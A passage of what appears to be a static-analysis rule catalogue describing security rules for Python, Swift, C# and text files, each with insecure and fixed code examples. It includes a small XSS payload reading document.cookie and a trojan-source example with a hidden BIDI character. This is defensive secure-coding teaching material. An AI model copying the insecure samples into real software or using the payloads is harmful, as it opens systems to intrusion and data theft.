    ec2.Peer.ipv4("192.0.2.0/24"),
    ec2.Port.tcp(22),
    description="Allows SSH from a trusted IPv4 range"
)

For aws_cdk.aws_ec2.SecurityGroup:

from aws_cdk import aws_ec2 as ec2
security_group = ec2.SecurityGroup(
    self,
    "custom-security-group",
    vpc=vpc
)

security_group.add_ingress_rule(
    ec2.Peer.any_ipv4(),
    ec2.Port.tcp_range(1024, 1048)
)

For aws_cdk.aws_ec2.CfnSecurityGroup:

from aws_cdk import aws_ec2 as ec2

ec2.CfnSecurityGroup(
    self,
    "cfn-based-security-group",
    group_description="cfn based security group",
    group_name="cfn-based-security-group",
    vpc_id=vpc.vpc_id,
    security_group_ingress=[
        ec2.CfnSecurityGroup.IngressProperty(
            ip_protocol="tcp",
            cidr_ip="0.0.0.0/0",
            from_port=1024,
            to_port=1048
        ),
        {
            "ipProtocol":"6",
            "cidrIp":"192.0.2.0/24",
            "fromPort":22,
            "toPort":22
        }
    ]
)

For aws_cdk.aws_ec2.CfnSecurityGroupIngress:

from aws_cdk import aws_ec2 as ec2

ec2.CfnSecurityGroupIngress(
    self,
    "ingress-all-ipv4-tcp-http",
    ip_protocol="6",
    cidr_ip="0.0.0.0/0",
    from_port=80,
    to_port=80,
    group_id=security_group.attr_group_id
)

ec2.CfnSecurityGroupIngress(
    self,
    "ingress-range-tcp-rdp",
    ip_protocol="tcp",
    cidr_ip="192.0.2.0/24",
    from_port=3389,
    to_port=3389,
    group_id=security_group.attr_group_id
)
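When trusted ranges come from configuration, they can be checked with the standard ipaddress module before they reach a security-group definition; this sketch (the helper name is illustrative) rejects catch-all CIDRs:

```python
import ipaddress

def is_trusted_admin_source(cidr: str) -> bool:
    # A /0 prefix (0.0.0.0/0 or ::/0) matches every address and must
    # never guard an administration port such as 22 or 3389.
    network = ipaddress.ip_network(cidr, strict=False)
    return network.prefixlen > 0

print(is_trusted_admin_source("192.0.2.0/24"))  # True
print(is_trusted_admin_source("0.0.0.0/0"))     # False
```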

Resources

Documentation

Standards

python:S4830

This vulnerability makes it possible for encrypted communication to be intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in Python Standard Library

Code examples

The following code contains examples of disabled certificate validation.

Certificate validation is disabled when _create_unverified_context or _create_stdlib_context is used. It is recommended to use _create_default_https_context instead, which creates a secure context that validates certificates.

Noncompliant code example

import ssl

ctx1 = ssl._create_unverified_context() # Noncompliant
ctx2 = ssl._create_stdlib_context() # Noncompliant

ctx3 = ssl.create_default_context()
ctx3.verify_mode = ssl.CERT_NONE # Noncompliant

Compliant solution

import ssl

ctx = ssl.create_default_context()
ctx.verify_mode = ssl.CERT_REQUIRED

# By default, certificate validation is enabled
ctx = ssl._create_default_https_context()

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.
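For example, with Python's ssl module the trust store can be extended instead of disabling validation (the certificate path below is illustrative):

```python
import ssl

# The default context already validates certificates and hostnames.
ctx = ssl.create_default_context()
assert ctx.verify_mode == ssl.CERT_REQUIRED

# To trust a self-signed or internal-CA certificate, load it into the
# context rather than setting verify_mode to CERT_NONE:
# ctx.load_verify_locations(cafile="certs/internal-ca.pem")
```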

Resources

Standards

python:S6333

Creating APIs without authentication unnecessarily increases the attack surface on the target infrastructure.

Unless another authentication method is used, attackers have the opportunity to attempt attacks against the underlying API.
This means attacks both on the functionality provided by the API and its infrastructure.

Ask Yourself Whether

  • The underlying API exposes all of its contents to any anonymous Internet user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

In general, prefer limiting API access to a specific set of people or entities.

AWS provides multiple methods to do so:

  • AWS_IAM, to use standard AWS IAM roles and policies.
  • COGNITO_USER_POOLS, to use customizable OpenID Connect (OIDC) identity providers (IdP).
  • CUSTOM, to use an AWS-independent OIDC provider, glued to the infrastructure with a Lambda authorizer.

Sensitive Code Example

For aws_cdk.aws_apigateway.Resource:

from aws_cdk import (
    aws_apigateway as apigateway
)

resource = api.root.add_resource("example")
resource.add_method(
    "GET",
    authorization_type=apigateway.AuthorizationType.NONE  # Sensitive
)

For aws_cdk.aws_apigatewayv2.CfnRoute:

from aws_cdk import (
    aws_apigatewayv2 as apigateway
)

apigateway.CfnRoute(
    self,
    "no-auth",
    api_id=api.ref,
    route_key="GET /test",
    authorization_type="NONE"  # Sensitive
)

Compliant Solution

For aws_cdk.aws_apigateway.Resource:

from aws_cdk import (
    aws_apigateway as apigateway
)

opts = apigateway.MethodOptions(
    authorization_type=apigateway.AuthorizationType.IAM
)
resource = api.root.add_resource(
    "example",
    default_method_options=opts
)
resource.add_method(
    "POST",
    authorization_type=apigateway.AuthorizationType.IAM
)
resource.add_method(  # authorization_type is inherited from the Resource's configured default_method_options
    "POST"
)

For aws_cdk.aws_apigatewayv2.CfnRoute:

from aws_cdk import (
    aws_apigatewayv2 as apigateway
)

apigateway.CfnRoute(
    self,
    "auth",
    api_id=api.ref,
    route_key="GET /test",
    authorization_type="AWS_IAM"
)

See

python:S5247

To reduce the risk of cross-site scripting attacks, templating systems such as Twig, Django, Smarty, and Groovy's template engine allow automatic escaping of variables before templates are rendered. When escaping occurs, characters that are meaningful to the browser (e.g. <a>) are transformed/replaced with escaped/sanitized values (e.g. &lt;a&gt;).

Auto-escaping is not a magic feature that annihilates all cross-site scripting attacks; its effectiveness depends on the strategy applied and the context. For example, an "HTML auto-escaping" strategy (which only transforms HTML characters into HTML entities) is not sufficient when variables are used in an HTML attribute, because the ':' character is not escaped, making an attack like the following possible:

<a href="{{ myLink }}">link</a> // myLink = javascript:alert(document.cookie)
<a href="javascript:alert(document.cookie)">link</a> // JS injection (XSS attack)
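The escaping transformation itself can be illustrated with Python's standard library, independently of any template engine; note that ':' is untouched, which is why HTML escaping alone does not protect attribute contexts such as href:

```python
from html import escape

# Characters meaningful to the browser become HTML entities.
print(escape("<script>alert(document.cookie)</script>"))
# The ':' in a javascript: URL is left as-is by HTML escaping.
print(escape("javascript:alert(1)"))
```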

Ask Yourself Whether

  • Templates are used to render web content and
    • dynamic variables in templates come from untrusted locations or are user-controlled inputs
    • there is no local mechanism in place to sanitize or validate the inputs.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Enable auto-escaping by default and continue to review the use of inputs in order to be sure that the chosen auto-escaping strategy is the right one.

Sensitive Code Example

from jinja2 import Environment

env = Environment() # Sensitive: New Jinja2 Environment has autoescape set to false
env = Environment(autoescape=False) # Sensitive:

Compliant Solution

from jinja2 import Environment
env = Environment(autoescape=True) # Compliant

See

python:S6330

Amazon Simple Queue Service (SQS) is a managed message queuing service for application-to-application (A2A) communication. Amazon SQS can encrypt messages as soon as they are received. If adversaries gain physical access to the storage medium, or otherwise leak a message from the file system (for example through a vulnerability in the service), they are not able to access the data.

Ask Yourself Whether

  • The queue contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SQS queues that contain sensitive information. Encryption and decryption are handled transparently by SQS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_sqs.Queue:

from aws_cdk import (
    aws_sqs as sqs
)

class QueueStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        sqs.Queue( # Sensitive, unencrypted by default
            self,
            "example"
        )

For aws_cdk.aws_sqs.CfnQueue:

from aws_cdk import (
    aws_sqs as sqs
)

class CfnQueueStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        sqs.CfnQueue( # Sensitive, unencrypted by default
            self,
            "example"
        )

Compliant Solution

For aws_cdk.aws_sqs.Queue:

from aws_cdk import (
    aws_sqs as sqs
)

class QueueStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        sqs.Queue(
            self,
            "example",
            encryption=sqs.QueueEncryption.KMS_MANAGED
        )

For aws_cdk.aws_sqs.CfnQueue:

from aws_cdk import (
    aws_kms as kms,
    aws_sqs as sqs
)

class CfnQueueStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        my_key = kms.Key(self, "key")
        sqs.CfnQueue(
            self,
            "example",
            kms_master_key_id=my_key.key_id
        )

See

python:S6332

Amazon Elastic File System (EFS) is a serverless file system that does not require provisioning or managing storage. Stored files can be automatically encrypted by the service. If adversaries gain physical access to the storage medium or otherwise leak stored files, they are not able to access the data.

Ask Yourself Whether

  • The file system contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EFS file systems that contain sensitive information. Encryption and decryption are handled transparently by EFS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_cdk.aws_efs.FileSystem and aws_cdk.aws_efs.CfnFileSystem:

from aws_cdk import (
    aws_efs as efs
)

efs.FileSystem(
    self,
    "example",
    encrypted=False  # Sensitive
)

Compliant Solution

For aws_cdk.aws_efs.FileSystem and aws_cdk.aws_efs.CfnFileSystem:

from aws_cdk import (
    aws_efs as efs
)

efs.FileSystem(
    self,
    "example",
    encrypted=True
)

See

python:S5122

Having a permissive Cross-Origin Resource Sharing (CORS) policy is security-sensitive and has led to vulnerabilities in the past.

The same-origin policy in browsers prevents, by default and for security reasons, a JavaScript frontend from performing a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers to its response, called CORS headers, that act as directives for the browser and change the access control policy (i.e., relax the same-origin policy).

Ask Yourself Whether

  • You don’t trust the origin specified, for example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • The access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input such as the Origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

Django:

CORS_ORIGIN_ALLOW_ALL = True # Sensitive

Flask:

from flask import Flask
from flask_cors import CORS

app = Flask(__name__)
CORS(app, resources={r"/*": {"origins": "*", "send_wildcard": True}}) # Sensitive

User-controlled origin:

origin = request.headers['ORIGIN']
resp = Response()
resp.headers['Access-Control-Allow-Origin'] = origin # Sensitive

Compliant Solution

Django:

CORS_ORIGIN_ALLOW_ALL = False # Compliant

Flask:

from flask import Flask
from flask_cors import CORS

app = Flask(__name__)
CORS(app, resources={r"/*": {"origins": "*", "send_wildcard": False}}) # Compliant

User-controlled origin validated with an allow-list:

origin = request.headers['ORIGIN']
resp = Response()
if origin in TRUSTED_ORIGINS:
   resp.headers['Access-Control-Allow-Origin'] = origin
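The TRUSTED_ORIGINS allow-list is left abstract above; a minimal sketch (the origins shown are illustrative):

```python
TRUSTED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}

def allowed_origin(origin: str):
    # Echo the origin back only if it is explicitly trusted; returning
    # None means no Access-Control-Allow-Origin header is set at all.
    return origin if origin in TRUSTED_ORIGINS else None
```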

See

python:S2092

When a cookie is protected with the secure attribute set to true, it will not be sent by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is, for instance, a session cookie that is not designed to be sent over non-HTTPS communication.
  • you are not sure whether the website contains mixed content (i.e., whether HTTPS is used everywhere).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPS everywhere, so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session cookies.

Sensitive Code Example

Flask

from flask import Response

@app.route('/')
def index():
    response = Response()
    response.set_cookie('key', 'value') # Sensitive
    return response

Compliant Solution

Flask

from flask import Response

@app.route('/')
def index():
    response = Response()
    response.set_cookie('key', 'value', secure=True) # Compliant
    return response

See

swift:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, this practice has led to multiple vulnerabilities.

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

let postData = "username=Steve&password=123456".data(using: .utf8)  // Sensitive
//...
var request = URLRequest(url: url)
request.httpBody = postData

Compliant Solution

let postData = "username=\(getEncryptedUser())&password=\(getEncryptedPass())".data(using: .utf8)
//...
var request = URLRequest(url: url)
request.httpBody = postData

See

swift:S2070

This rule is deprecated; use S4790 instead.

Why is this an issue?

The MD5 algorithm and its successor, SHA-1, are no longer considered secure, because it is too easy to create hash collisions with them. That is, it takes too little computational effort to come up with a different input that produces the same MD5 or SHA-1 hash, and using the new, same-hash value gives an attacker the same access as if they had the originally-hashed value. This applies as well to the other Message-Digest algorithms: MD2, MD4, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, and HMAC-RIPEMD160.

Consider using safer alternatives, such as SHA-256, SHA-512 or SHA-3.

Noncompliant code example

import CryptoSwift

let bytes: Array<UInt8> = [0x01, 0x02, 0x03]
let digest = bytes.md5() // Noncompliant

Compliant solution

import CryptoSwift

let bytes:Array<UInt8> = [0x01, 0x02, 0x03]
let digest = input.sha256() // Compliant

Resources

swift:S2278

This rule is deprecated; use S5547 instead.

Why is this an issue?

According to the US National Institute of Standards and Technology (NIST), the Data Encryption Standard (DES) is no longer considered secure:

Adopted in 1977 for federal agencies to use in protecting sensitive, unclassified information, the DES is being withdrawn because it no longer provides the security that is needed to protect federal government information.

Federal agencies are encouraged to use the Advanced Encryption Standard, a faster and stronger algorithm approved as FIPS 197 in 2001.

For similar reasons, RC2 should also be avoided.

Noncompliant code example

let cryptor = try Cryptor(operation: .encrypt, algorithm: .des, options: .none, key: key, iv: []) // Noncompliant

let crypt = CkoCrypt2()
crypt.CryptAlgorithm = "3des" // Noncompliant

Compliant solution

let cryptor = try Cryptor(operation: .encrypt, algorithm: .aes, options: .none, key: key, iv: []) // Compliant

let crypt = CkoCrypt2()
crypt.CryptAlgorithm = "aes" // Compliant

Resources

swift:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm, the likelihood that an attacker might be able to recover the cleartext increases drastically.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in CommonCrypto

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

import CommonCrypto

let algorithm = CCAlgorithm(kCCAlgorithmDES) // Noncompliant

Compliant solution

import Crypto

let sealedBox = try AES.GCM.seal(input, using: key)

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

swift:S1313

Hardcoding IP addresses is security-sensitive and has led to vulnerabilities in the past.

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to issue a rapid fix every time this happens, instead of having an operations team change a configuration file.
  • It encourages using the same address in every environment (dev, sys, qa, prod), which is misleading.

Last but not least, it affects application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to gain access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but when the IP address is hardcoded, fixing the issue takes longer, which increases the attack's impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • It can give an attacker information about the network topology.
  • It is a personal IP address (assigned to an identifiable person).

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

let host = Host(address: "192.168.12.42")

Compliant Solution

let host = Host(address: configuration.ipAddress)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849
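The exception ranges above can be checked mechanically. This hypothetical helper (not part of the rule itself) uses Python's standard ipaddress module:

```python
import ipaddress

# Ranges the rule treats as non-sensitive (see the exception list above).
EXEMPT_NETWORKS = [
    ipaddress.ip_network("127.0.0.0/8"),         # loopback
    ipaddress.ip_network("0.0.0.0/32"),          # non-routable
    ipaddress.ip_network("255.255.255.255/32"),  # broadcast
    ipaddress.ip_network("192.0.2.0/24"),        # RFC 5737 documentation
    ipaddress.ip_network("198.51.100.0/24"),     # RFC 5737 documentation
    ipaddress.ip_network("203.0.113.0/24"),      # RFC 5737 documentation
    ipaddress.ip_network("2001:db8::/32"),       # RFC 3849 documentation
]

def is_exempt(address: str) -> bool:
    """True if the address falls in a range the rule does not report."""
    addr = ipaddress.ip_address(address)
    # Guard on version: IPv4 addresses cannot be tested against IPv6 networks.
    return any(addr in net for net in EXEMPT_NETWORKS if addr.version == net.version)

print(is_exempt("127.0.0.1"))      # True: loopback
print(is_exempt("192.168.12.42"))  # False: would be flagged as sensitive
```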

See

swift:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm an e-mail address when registering on a website, to reset a password, etc.).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512 or SHA-3, are recommended. For password hashing, it's even better to use algorithms that are deliberately slow to compute, like bcrypt, scrypt, argon2 or pbkdf2, because this slows down brute-force attacks.
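To illustrate the "deliberately slow" property with standard-library code, here is a sketch using PBKDF2 from Python's hashlib. The iteration count is illustrative; follow current guidance when choosing it in production:

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a per-user random salt and a high iteration count."""
    salt = salt or os.urandom(16)
    # 100_000 iterations is illustrative; tune to current recommendations.
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password, salt, expected):
    """Recompute the digest and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
print(verify_password("wrong guess", salt, stored))                   # False
```

Each verification attempt costs the attacker the full iteration count, which is exactly what makes offline brute force expensive.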

Sensitive Code Example

import CryptoSwift

let bytes:Array<UInt8> = [0x01, 0x02, 0x03]
let digest = input.md5() // Sensitive

Compliant Solution

import CryptoSwift

let bytes:Array<UInt8> = [0x01, 0x02, 0x03]
let digest = input.sha512() // Compliant

See

text:S6389

Using bidirectional (BIDI) characters can lead to incomprehensible code.

The Unicode standard contains BIDI control characters that are used to display text right-to-left (RTL) instead of left-to-right (LTR). This is necessary for certain languages that use RTL text. The BIDI characters can be used to create a difference between what a human sees in the code and what a compiler or interpreter sees. An adversary might use this feature to hide a backdoor in the code that will not be spotted by a human reviewer, as it is not visible.

This can lead to supply chain attacks since the backdoored code might persist over a long time without being detected and can even be included in other projects, for example in the case of libraries.

Ask Yourself Whether

  • This text requires a right-to-left writing system (to use Arabic or Hebrew words, for example).
  • The author of this text is a legitimate user.
  • This text contains a standard instruction, comment or sequence of characters.

There is a risk if you answered no to any of these questions.

Recommended Secure Coding Practices

Open the file in an editor that reveals non-ASCII characters and remove all BIDI control characters that are not intended.

If hidden characters are illegitimate, this issue could indicate a potential ongoing attack on the code. Therefore, it would be best to warn your organization’s security team about this issue.

Required opening BIDI characters should be explicitly closed with the PDI character.
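A reviewer or CI job can detect such characters mechanically. This hypothetical checker flags the Unicode BIDI control characters discussed above:

```python
# Unicode bidirectional control characters: LRE, RLE, PDF, LRO, RLO (U+202A..U+202E)
# and LRI, RLI, FSI, PDI (U+2066..U+2069).
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
    "\u2066", "\u2067", "\u2068", "\u2069",
}

def find_bidi_controls(source):
    """Return (line, column) positions of BIDI control characters in source text."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                hits.append((lineno, col))
    return hits

clean = "def f():\n    return 1\n"
trojan = "''' comment \u2067''' ;return\n"  # hidden RLI before the closing quotes
print(find_bidi_controls(clean))   # []
print(find_bidi_controls(trojan))  # [(1, 13)]
```

Running such a check in a pre-commit hook makes the invisible characters visible before a human review even starts.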

Sensitive Code Example

A hidden BIDI character is present in front of return:

def subtract_funds(account: str, amount: int):
    ''' Subtract funds from bank account then ⁧''' ;return
    bank[account] -= amount
    return

The executed code looks like the following:

def subtract_funds(account: str, amount: int):
    ''' Subtract funds from bank account then <RLI>''' ;return
    bank[account] -= amount
    return

Compliant Solution

No hidden BIDI characters are present:

def subtract_funds(account: str, amount: int):
    ''' Subtract funds from bank account then return; '''
    bank[account] -= amount
    return

See

csharpsquid:S2228

This rule is deprecated; use S106 instead.

Why is this an issue?

Debug statements are always useful during development. But including them in production code, particularly in code that runs client-side, risks inadvertently exposing sensitive information.

Noncompliant code example

private void DoSomething()
{
    // ...
    Console.WriteLine("so far, so good..."); // Noncompliant
    // ...
}

Exceptions

The following are ignored by this rule:

  • Console Applications
  • Calls in methods decorated with [Conditional ("DEBUG")]
  • Calls included in DEBUG preprocessor branches (#if DEBUG)

Resources

csharpsquid:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that they did not intend, such as updating their profile or sending a message; more generally, anything that can change the state of the application.

The attacker can trick the user/victim into clicking a link corresponding to the privileged action, or into visiting a malicious website that embeds a hidden web request. Because web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state / resources of the web application can be modified by doing HTTP POST or HTTP DELETE requests for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token.
  • Sensitive operations should never be performed with safe HTTP methods like GET, which are designed to be used only for information retrieval.
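The "unguessable CSRF token" recommendation can be sketched framework-independently. This illustration uses Python's secrets module; the session dictionary stands in for whatever session store the framework provides:

```python
import hmac
import secrets

def issue_csrf_token(session):
    """Generate an unguessable token and bind it to the user's session."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def validate_csrf_token(session, submitted):
    """Constant-time comparison against the token stored in the session."""
    expected = session.get("csrf_token", "")
    return bool(expected) and hmac.compare_digest(expected, submitted)

session = {}
token = issue_csrf_token(session)
print(validate_csrf_token(session, token))     # True: genuine form post
print(validate_csrf_token(session, "forged"))  # False: attacker cannot guess the token
```

In ASP.NET Core, the antiforgery filters shown in the Compliant Solution implement this pattern for you; there is rarely a reason to hand-roll it.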

Sensitive Code Example

public void ConfigureServices(IServiceCollection services)
{
    // ...
    services.AddControllersWithViews(options => options.Filters.Add(new IgnoreAntiforgeryTokenAttribute())); // Sensitive
    // ...
}
[HttpPost, IgnoreAntiforgeryToken] // Sensitive
public IActionResult ChangeEmail(ChangeEmailModel model) => View("~/Views/...");

Compliant Solution

public void ConfigureServices(IServiceCollection services)
{
    // ...
    services.AddControllersWithViews(options => options.Filters.Add(new AutoValidateAntiforgeryTokenAttribute()));
    // or
    services.AddControllersWithViews(options => options.Filters.Add(new ValidateAntiForgeryTokenAttribute()));
    // ...
}
[HttpPost]
[AutoValidateAntiforgeryToken]
public IActionResult ChangeEmail(ChangeEmailModel model) => View("~/Views/...");

See

csharpsquid:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers.

The .NET Core framework offers multiple features that help during debugging. Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDeveloperExceptionPage and Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDatabaseErrorPage are two of them. Make sure that those features are disabled in production.

Use if (env.IsDevelopment()) to disable debug code.

Sensitive Code Example

This rule raises issues when the following .NET Core methods are called: Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDeveloperExceptionPage, Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDatabaseErrorPage.

using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;

namespace mvcApp
{
    public class Startup2
    {
        public void Configure(IApplicationBuilder app, IHostingEnvironment env)
        {
            // Those calls are Sensitive because it seems that they will run in production
            app.UseDeveloperExceptionPage(); // Sensitive
            app.UseDatabaseErrorPage(); // Sensitive
        }
    }
}

Compliant Solution

using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;

namespace mvcApp
{
    public class Startup2
    {
        public void Configure(IApplicationBuilder app, IHostingEnvironment env)
        {
            if (env.IsDevelopment())
            {
                // The following calls are ok because they are disabled in production
                app.UseDeveloperExceptionPage(); // Compliant
                app.UseDatabaseErrorPage(); // Compliant
            }
        }
    }
}

Exceptions

This rule does not analyze configuration files. Make sure that debug mode is not enabled by default in those files.

See

csharpsquid:S5773

Why is this an issue?

During the deserialization process, the state of an object will be reconstructed from the serialized data stream which can contain dangerous operations.

For example, a well-known attack vector consists in serializing an object of type TempFileCollection with arbitrary files (defined by an attacker) that will be deleted when the application deserializes this object (when the finalizer of the TempFileCollection object runs). Such types are called "gadgets".

Instead of using BinaryFormatter and similar serializers, it is recommended to use safer alternatives in most cases, such as XmlSerializer or DataContractSerializer. If that is not possible, then try to mitigate the risk by restricting the types allowed to be deserialized:

  • by implementing an "allow-list" of types; but keep in mind that novel dangerous types are regularly discovered, so this protection could become insufficient over time.
  • and/or by implementing tamper protection, such as message authentication codes (MAC). This way, only objects serialized with the correct MAC hash will be deserialized.
